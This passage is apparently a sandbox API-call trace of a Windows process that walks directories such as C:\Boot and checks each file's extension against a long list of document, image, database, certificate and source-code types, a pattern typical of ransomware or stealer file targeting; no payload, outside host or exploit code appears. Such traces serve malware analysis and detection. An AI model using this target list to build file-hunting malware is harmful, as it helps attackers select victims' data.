lpString2="mui") returned -1 [0286.031] lstrlenW (lpString=".cfc") returned 4 [0286.031] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0286.031] lstrlenW (lpString=".cfm") returned 4 [0286.031] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0286.031] lstrlenW (lpString=".cfml") returned 5 [0286.031] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0286.031] lstrlenW (lpString=".cfu") returned 4 [0286.031] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0286.031] lstrlenW (lpString=".chm") returned 4 [0286.031] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0286.031] lstrlenW (lpString=".cin") returned 4 [0286.031] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0286.031] lstrlenW (lpString=".class") returned 6 [0286.031] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0286.031] lstrlenW (lpString=".clx") returned 4 [0286.031] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0286.031] lstrlenW (lpString=".config") returned 7 [0286.031] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0286.031] lstrlenW (lpString=".cpp") returned 4 [0286.031] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0286.031] lstrlenW (lpString=".cr2") returned 4 [0286.031] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".crt") returned 4 [0286.032] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".crw") returned 4 [0286.032] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".cs") returned 3 [0286.032] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0286.032] lstrlenW (lpString=".css") returned 4 [0286.032] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".csv") returned 4 [0286.032] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".cub") returned 4 [0286.032] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".dae") returned 4 [0286.032] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".dat") returned 4 [0286.032] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".db") returned 3 [0286.032] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0286.032] lstrlenW (lpString=".dbf") returned 4 [0286.032] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".dbx") returned 4 [0286.032] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".dc3") returned 4 [0286.032] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".dcm") returned 4 [0286.032] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".dcr") returned 4 [0286.032] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".der") returned 4 [0286.032] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0286.032] lstrlenW (lpString=".dib") returned 4 [0286.033] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0286.033] lstrlenW (lpString=".dic") returned 4 [0286.033] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0286.033] lstrlenW (lpString=".dif") returned 4 [0286.033] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0286.033] lstrlenW (lpString=".divx") returned 5 [0286.033] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0286.033] lstrlenW (lpString=".djvu") returned 5 [0286.033] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0286.033] lstrlenW (lpString=".dng") returned 4 [0286.033] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0286.033] lstrlenW (lpString=".doc") returned 4 [0286.033] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.033] lstrlenW (lpString=".docm") returned 5 [0286.033] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0286.033] lstrlenW (lpString=".docx") returned 5 [0286.033] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.033] lstrlenW (lpString=".dot") returned 4 [0286.033] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0286.033] lstrlenW (lpString=".dotm") returned 5 [0286.033] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0286.033] lstrlenW (lpString=".dotx") returned 5 [0286.033] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0286.033] lstrlenW (lpString=".dpx") returned 4 [0286.033] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0286.033] lstrlenW (lpString=".dqy") returned 4 [0286.033] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0286.033] lstrlenW (lpString=".dsn") returned 4 [0286.033] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0286.033] lstrlenW (lpString=".dt") returned 3 [0286.033] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0286.033] lstrlenW (lpString=".dtd") returned 4 [0286.033] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0286.033] lstrlenW (lpString=".dwg") returned 4 [0286.034] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0286.034] lstrlenW (lpString=".dwt") returned 4 [0286.034] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0286.034] lstrlenW (lpString=".dx") returned 3 [0286.034] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0286.034] lstrlenW (lpString=".dxf") returned 4 [0286.034] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0286.034] lstrlenW (lpString=".edml") returned 5 [0286.034] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0286.034] lstrlenW (lpString=".efd") returned 4 [0286.034] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0286.034] lstrlenW (lpString=".elf") returned 4 [0286.034] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0286.034] lstrlenW (lpString=".emf") returned 4 [0286.034] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0286.034] lstrlenW (lpString=".emz") returned 4 [0286.034] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0286.034] lstrlenW (lpString=".epf") returned 4 [0286.034] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0286.034] lstrlenW (lpString=".eps") returned 4 [0286.034] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0286.034] lstrlenW (lpString=".epsf") returned 5 [0286.034] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0286.034] lstrlenW (lpString=".epsp") returned 5 [0286.034] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0286.034] lstrlenW (lpString=".erf") returned 4 [0286.034] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0286.034] lstrlenW (lpString=".exr") returned 4 [0286.034] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0286.034] lstrlenW (lpString=".f4v") returned 4 [0286.034] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".fido") returned 5 [0286.035] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0286.035] lstrlenW (lpString=".flm") returned 4 [0286.035] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".flv") returned 4 [0286.035] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".frm") returned 4 [0286.035] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".fxg") returned 4 [0286.035] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".geo") returned 4 [0286.035] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".gif") returned 4 [0286.035] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".grs") returned 4 [0286.035] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".gz") returned 3 [0286.035] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0286.035] lstrlenW (lpString=".h") returned 2 [0286.035] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0286.035] lstrlenW (lpString=".hdr") returned 4 [0286.035] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".hpp") returned 4 [0286.035] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".hta") returned 4 [0286.035] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".htc") returned 4 [0286.035] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".htm") returned 4 [0286.035] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0286.035] lstrlenW (lpString=".html") returned 5 [0286.035] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0286.035] lstrlenW (lpString=".icb") returned 4 [0286.036] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".ics") returned 4 [0286.036] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".iff") returned 4 [0286.036] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".inc") returned 4 [0286.036] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".indd") returned 5 [0286.036] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0286.036] lstrlenW (lpString=".ini") returned 4 [0286.036] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".iqy") returned 4 [0286.036] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".j2c") returned 4 [0286.036] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".j2k") returned 4 [0286.036] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".java") returned 5 [0286.036] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0286.036] lstrlenW (lpString=".jp2") returned 4 [0286.036] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".jpc") returned 4 [0286.036] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".jpe") returned 4 [0286.036] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".jpeg") returned 5 [0286.036] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0286.036] lstrlenW (lpString=".jpf") returned 4 [0286.036] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".jpg") returned 4 [0286.036] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".jpx") returned 4 [0286.036] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0286.036] lstrlenW (lpString=".js") returned 3 [0286.037] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0286.037] lstrlenW (lpString=".jsf") returned 4 [0286.037] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0286.037] lstrlenW (lpString=".json") returned 5 [0286.037] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0286.037] lstrlenW (lpString=".jsp") returned 4 [0286.037] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0286.037] lstrlenW (lpString=".kdc") returned 4 [0286.037] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0286.037] lstrlenW (lpString=".kmz") returned 4 [0286.037] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0286.037] lstrlenW (lpString=".kwm") returned 4 [0286.037] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0286.037] lstrlenW (lpString=".lasso") returned 6 [0286.037] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0286.037] lstrlenW (lpString=".lbi") returned 4 [0286.037] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0286.037] lstrlenW (lpString=".lgf") returned 4 [0286.037] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0286.037] lstrlenW (lpString=".lgp") returned 4 [0286.037] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0286.037] lstrlenW (lpString=".log") returned 4 [0286.037] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0286.037] lstrlenW (lpString=".m1v") returned 4 [0286.037] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0286.037] lstrlenW (lpString=".m4a") returned 4 [0286.037] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0286.037] lstrlenW (lpString=".m4v") returned 4 [0286.210] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".max") returned 4 [0286.210] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".md") returned 3 [0286.210] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0286.210] lstrlenW (lpString=".mda") returned 4 [0286.210] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".mdb") returned 4 [0286.210] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".mde") returned 4 [0286.210] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".mdf") returned 4 [0286.210] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".mdw") returned 4 [0286.210] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".mef") returned 4 [0286.210] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".mft") returned 4 [0286.210] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".mfw") returned 4 [0286.210] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".mht") returned 4 [0286.210] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".mhtml") returned 6 [0286.210] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0286.210] lstrlenW (lpString=".mka") returned 4 [0286.210] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0286.210] lstrlenW (lpString=".mkidx") returned 6 [0286.211] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0286.211] lstrlenW (lpString=".mkv") returned 4 [0286.211] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0286.211] lstrlenW (lpString=".mos") returned 4 [0286.211] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0286.211] lstrlenW (lpString=".mov") returned 4 [0286.211] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0286.211] lstrlenW (lpString=".mp3") returned 4 [0286.211] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0286.211] lstrlenW (lpString=".mp4") returned 4 [0286.211] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0286.211] lstrlenW (lpString=".mpeg") returned 5 [0286.211] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0286.211] lstrlenW (lpString=".mpg") returned 4 [0286.211] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0286.211] lstrlenW (lpString=".mpv") returned 4 [0286.211] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0286.211] lstrlenW (lpString=".mrw") returned 4 [0286.211] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0286.211] lstrlenW (lpString=".msg") returned 4 [0286.211] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0286.211] lstrlenW (lpString=".mxl") returned 4 [0286.211] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0286.211] lstrlenW (lpString=".myd") returned 4 [0286.211] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0286.211] lstrlenW (lpString=".myi") returned 4 [0286.212] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".nef") returned 4 [0286.212] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".nrw") returned 4 [0286.212] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".obj") returned 4 [0286.212] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".odb") returned 4 [0286.212] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".odc") returned 4 [0286.212] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".odm") returned 4 [0286.212] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".odp") returned 4 [0286.212] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".ods") returned 4 [0286.212] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".oft") returned 4 [0286.212] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".one") returned 4 [0286.212] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".onepkg") returned 7 [0286.212] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0286.212] lstrlenW (lpString=".onetoc2") returned 8 [0286.212] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0286.212] lstrlenW (lpString=".opt") returned 4 [0286.212] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".oqy") returned 4 [0286.212] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".orf") returned 4 [0286.212] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0286.212] lstrlenW (lpString=".p12") returned 4 [0286.213] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".p7b") returned 4 [0286.213] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".p7c") returned 4 [0286.213] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pam") returned 4 [0286.213] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pbm") returned 4 [0286.213] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pct") returned 4 [0286.213] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pcx") returned 4 [0286.213] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pdd") returned 4 [0286.213] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pdf") returned 4 [0286.213] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pdp") returned 4 [0286.213] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pef") returned 4 [0286.213] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pem") returned 4 [0286.213] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pff") returned 4 [0286.213] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pfm") returned 4 [0286.213] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0286.213] lstrlenW (lpString=".pfx") returned 4 [0286.214] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0286.214] lstrlenW (lpString=".pgm") returned 4 [0286.214] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0286.214] lstrlenW (lpString=".php") returned 4 [0286.214] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0286.214] lstrlenW (lpString=".php3") returned 5 [0286.214] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0286.214] lstrlenW (lpString=".php4") returned 5 [0286.214] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0286.214] lstrlenW (lpString=".php5") returned 5 [0286.214] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0286.214] lstrlenW (lpString=".phtml") returned 6 [0286.214] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0286.214] lstrlenW (lpString=".pict") returned 5 [0286.214] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0286.214] lstrlenW (lpString=".pl") returned 3 [0286.214] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0286.214] lstrlenW (lpString=".pls") returned 4 [0286.214] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0286.214] lstrlenW (lpString=".pm") returned 3 [0286.214] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0286.214] lstrlenW (lpString=".png") returned 4 [0286.214] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0286.214] lstrlenW (lpString=".pnm") returned 4 [0286.214] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0286.214] lstrlenW (lpString=".pot") returned 4 [0286.214] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0286.215] lstrlenW (lpString=".potm") returned 5 [0286.215] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0286.215] lstrlenW (lpString=".potx") returned 5 [0286.215] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0286.215] lstrlenW (lpString=".ppa") returned 4 [0286.215] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0286.215] lstrlenW (lpString=".ppam") returned 5 [0286.215] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0286.215] lstrlenW (lpString=".ppm") returned 4 [0286.215] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0286.215] lstrlenW (lpString=".pps") returned 4 [0286.215] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0286.215] lstrlenW (lpString=".ppsm") returned 5 [0286.215] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0286.215] lstrlenW (lpString=".ppt") returned 4 [0286.215] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.215] lstrlenW (lpString=".pptm") returned 5 [0286.215] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0286.215] lstrlenW (lpString=".pptx") returned 5 [0286.215] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0286.215] lstrlenW (lpString=".prn") returned 4 [0286.215] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0286.215] lstrlenW (lpString=".ps") returned 3 [0286.215] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0286.215] lstrlenW (lpString=".psb") returned 4 [0286.215] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0286.215] lstrlenW (lpString=".psd") returned 4 [0286.216] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0286.216] lstrlenW (lpString=".pst") returned 4 [0286.216] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0286.216] lstrlenW (lpString=".ptx") returned 4 [0286.216] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0286.216] lstrlenW (lpString=".pub") returned 4 [0286.216] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0286.216] lstrlenW (lpString=".pwm") returned 4 [0286.216] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0286.216] lstrlenW (lpString=".pxr") returned 4 [0286.216] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0286.216] lstrlenW (lpString=".py") returned 3 [0286.216] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0286.216] lstrlenW (lpString=".qt") returned 3 [0286.216] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0286.216] lstrlenW (lpString=".r3d") returned 4 [0286.216] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0286.216] lstrlenW (lpString=".raf") returned 4 [0286.216] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0286.216] lstrlenW (lpString=".rar") returned 4 [0286.216] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.216] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.217] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.217] FindClose (in: hFindFile=0x39482e8 | out: hFindFile=0x39482e8) returned 1 [0286.217] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.217] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="it-IT", cAlternateFileName="")) returned 1 [0286.217] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.217] lstrlenW (lpString="C:\\Boot\\it-IT") returned 13 [0286.217] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0286.217] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.218] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, 